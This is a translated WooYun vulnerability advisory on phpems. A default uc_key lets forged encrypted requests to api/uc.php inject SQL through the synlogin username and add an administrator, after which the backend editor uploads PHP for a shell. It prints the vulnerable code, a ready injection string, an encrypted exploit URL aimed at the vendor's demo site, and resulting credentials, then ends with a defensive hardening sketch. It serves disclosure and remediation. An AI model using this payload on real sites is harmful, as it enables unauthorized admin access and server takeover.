
Vulnerability summary

Defect ID: wooyun-2015-095619

Title: phpems configuration defect allows adding an administrator directly, leading to getshell

Vendor: phpems

Author: Zxsoft

Submitted: 2015-02-10 18:54

Fix deadline: 2015-04-30 18:48

Published: 2015-04-30 18:48

Type: design flaw / logic error

Severity: High

Self-assessed rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-02-10: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2015-04-30: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

phpems ships with the default uc_key 1234567890.
Anyone who knows the key can therefore use UC's own encryption function to encrypt malicious input, which is then carried into an SQL statement.

Detailed description:

The entry point is api/uc.php, which decrypts the code parameter with UC_KEY and dispatches on the decrypted action:

if(!defined('IN_UC')) {
    error_reporting(0);
    set_magic_quotes_runtime(0);

    defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
    require_once 'config.inc.php';
    $_DCACHE = $get = $post = array();
    $code = @$_GET['code']; // code = the encrypted request
    parse_str(_authcode($code, 'DECODE', UC_KEY), $get); // decrypted here, with UC_KEY
    //var_dump($get);
    if(MAGIC_QUOTES_GPC) {
        $get = _stripslashes($get); // intent unclear: strips backslashes after decryption
    }
    $timestamp = time();
    echo $timestamp - $get['time'];
    if($timestamp - $get['time'] > 3600) { // time is attacker-controlled
        exit('Authracation has expiried');
    }
    if(empty($get)) {
        exit('Invalid Request');
    }
    $action = $get['action']; // action is attacker-controlled
    require_once 'uc_client/lib/xml.class.php';
    $post = xml_unserialize(file_get_contents('php://input'));
    if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcreditsettings', 'updatecreditsettings'))) {
        /**
        require_once 'include/db_mysql.class.php';
        $GLOBALS['db'] = new dbstuff;
        $GLOBALS['db']->connect($dbhost, $dbuser, $dbpw, $dbname, $pconnect, true, $dbcharset);
        print_r($GLOBALS['db']);
        $GLOBALS['tablepre'] = $tablepre;
        unset($dbhost, $dbuser, $dbpw, $dbname, $pconnect);
        **/
        $uc_note = new uc_note();
        //file_put_contents('aa.txt','1');
        exit($uc_note->$get['action']($get, $post));
    } else {
        exit(API_RETURN_FAILED);
    }
} else {


uc_note->synlogin:

function synlogin($get, $post) {
    $uid = $get['uid'];
    //$username = iconv('gbk','utf-8',$get['username']);
    // GBK forum builds use the line above
    $username = $get['username'];
    // UTF-8 builds use the line above
    if(!API_SYNLOGIN) {
        return API_RETURN_FORBIDDEN;
    }
    $sql = "set names utf8";
    $this->dblink->query($sql);
    $sql = "SELECT * FROM ".DTH."user WHERE username = '{$username}'"; // injection point 1
    $u = $this->dblink->fetch_first($sql);
    $args = array();
    if(!$u){ // for a username that does not exist, $u is null here
        $sql = "SELECT * FROM ".DTH."user_group WHERE groupdefault = '1'";
        $g = $this->dblink->fetch_first($sql);
        $grouid = $g['groupid'];
        $email = $username."@phpems.net";
        $pass = md5(rand(1000,9999));
        $sql = "INSERT INTO ".DTH."user (`username`,`useremail`,`userpassword`,`usergroupid`,`userregtime`,`userregip`) VALUES ('{$username}','{$email}','{$pass}','{$grouid}','".TIME."','".$this->_getClientIp()."')"; // username is attacker-controlled (it is the decrypted content), so an administrator row can be inserted directly
        $this->dblink->query($sql);
        $args = array('sessionuserid'=>$this->dblink->insert_id(),'sessionpassword'=>$pass,'sessionip'=>$this->_getClientIp(),'sessiongroupid'=>$grouid,'sessionlogintime'=>TIME,'sessionusername'=>$username);
    }
    else
        $args = array('sessionuserid'=>$u['userid'],'sessionpassword'=>$u['userpassword'],'sessionip'=>$this->_getClientIp(),'sessiongroupid'=>$u['usergroupid'],'sessionlogintime'=>TIME,'sessionusername'=>$u['username']);
    if(!$args['sessiontimelimit'])$args['sessiontimelimit'] = TIME;
    if(!$this->sessionid)$this->_getSessionId();
    $args['sessionid'] = $this->sessionid;
    $args['sessiontimelimit'] = TIME;
    $data = array('session',$args);
    $sql = $this->_makeReplace($data);
    $this->dblink->query($sql);
}


Proof of vulnerability:

Tested against the official demo:

[screenshot: phpems.png]


There is no account "testadmin" yet; let's add one.
Encrypt this string and submit it:
$str="time=2999999999999999&action=synlogin&username=testadmin','[email protected]','e10adc3949ba59abbe56e057f20f883e','1','2015-02-04','127.0.0.1')#";

[screenshot: jm.png]


www.phpems.net/2014/api/uc.php?code=b843/GkLQIWizbadvdy6o9/js/s0OOsDQZq3KhHhyW2nzNTxN6WfQg%2BnwtL3Qbz3YXVpYmC8ibpOgTv9cGHr3TwHHikzy7GtDTEQukPOXPVUzzraPvurp0F78QTp9/ggYXev9PP/iawD/u0lLkhLuf3a2rMZco0l6lbtBQhOC%2BLLKQldXEcjVN0mRV8GrxkEyOBjq0jWVjMuVlzT%2BFNcfqrej0RPozYcWgs0OOsDQZq3KhHhyW2nzNTxN6WfQg
testadmin, password: 123456
You can log in on the front end and then click the admin-backend link; there is no need to even look for the admin panel.
The backend editor allows uploading PHP files directly.

[screenshot: phpcms1.png]


A backdoor left behind by someone who previously got a shell via the uc key:

[screenshot: phpems2.png]


Other sites:

[screenshot: qt.png]


Fix:

Use a random string for uc_key.
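The analysis above shows three weaknesses stacked on one another: a guessable UC_KEY (whoever knows it can mint any $get array, because _authcode is symmetric), a freshness check that only rejects tokens older than an hour (a far-future time value passes), and a decrypted username interpolated straight into SQL. The following sketch is an added example, not phpems or UCenter code, of how the uc.php entry check and the synlogin user-creation path could be hardened. It assumes PHP 7 or later (random_bytes, password_hash), a PDO connection $pdo, the DTH table-prefix constant from the report, and that the application's login path verifies password_hash() hashes; the function names are hypothetical.

```php
<?php
// Added example (not phpems/UCenter code): hardening the paths discussed
// in the report. Assumes PHP >= 7, a PDO handle $pdo and the DTH constant.

// 1. Key: the fix is "use a random string for uc_key". Generate the key
//    once at install time from a CSPRNG and write it to config.inc.php;
//    a short or default value lets anyone forge the encrypted request.
function generate_uc_key(int $bytes = 32): string {
    return bin2hex(random_bytes($bytes)); // 64 hex characters
}

// 2. Freshness: the original only tests ($now - $time) > 3600, so a
//    far-future "time" (as in the PoC) is accepted. Require an integer
//    and reject clock skew in both directions.
function token_is_fresh($time, int $now, int $window = 3600): bool {
    if (!is_int($time) && !is_string($time)) {
        return false;
    }
    if (!preg_match('/^\d{1,10}$/', (string) $time)) {
        return false;
    }
    return abs($now - (int) $time) <= $window;
}

// 3. Username: whitelist the decrypted value instead of trusting the key
//    to have kept it honest. Letters, digits, underscore and CJK, 1-15 chars.
function username_is_valid(string $username): bool {
    return (bool) preg_match('/^[A-Za-z0-9_\x{4e00}-\x{9fa5}]{1,15}$/u', $username);
}

// 4. User creation via prepared statements. The default group still comes
//    from user_group, but the password is a real random secret rather than
//    md5(rand(1000,9999)), and nothing from $get reaches the SQL text.
function create_default_user(PDO $pdo, string $username, string $ip): int {
    if (!username_is_valid($username)) {
        throw new InvalidArgumentException('rejected username');
    }
    $groupid = (int) $pdo
        ->query("SELECT groupid FROM " . DTH . "user_group WHERE groupdefault = '1'")
        ->fetchColumn();

    $password = bin2hex(random_bytes(16));
    $stmt = $pdo->prepare(
        "INSERT INTO " . DTH . "user"
        . " (username, useremail, userpassword, usergroupid, userregtime, userregip)"
        . " VALUES (:u, :e, :p, :g, :t, :ip)"
    );
    $stmt->execute([
        ':u'  => $username,
        ':e'  => $username . '@phpems.net',
        ':p'  => password_hash($password, PASSWORD_DEFAULT),
        ':g'  => $groupid,
        ':t'  => time(),
        ':ip' => $ip,
    ]);
    return (int) $pdo->lastInsertId();
}

// Entry check as uc.php would apply it before dispatching on action.
function accept_request(array $get, int $now): bool {
    return isset($get['time'], $get['action'], $get['username'])
        && token_is_fresh($get['time'], $now)
        && username_is_valid((string) $get['username']);
}
```

With these checks the PoC payload fails twice before any SQL runs: its time value is out of the window, and its username contains quotes and parentheses. Rotating UC_KEY also invalidates any previously minted code parameters, which matters here because the report shows installations that were already backdoored through the default key.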

Copyright notice: when reposting, credit the source: Zxsoft@WooYun


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined.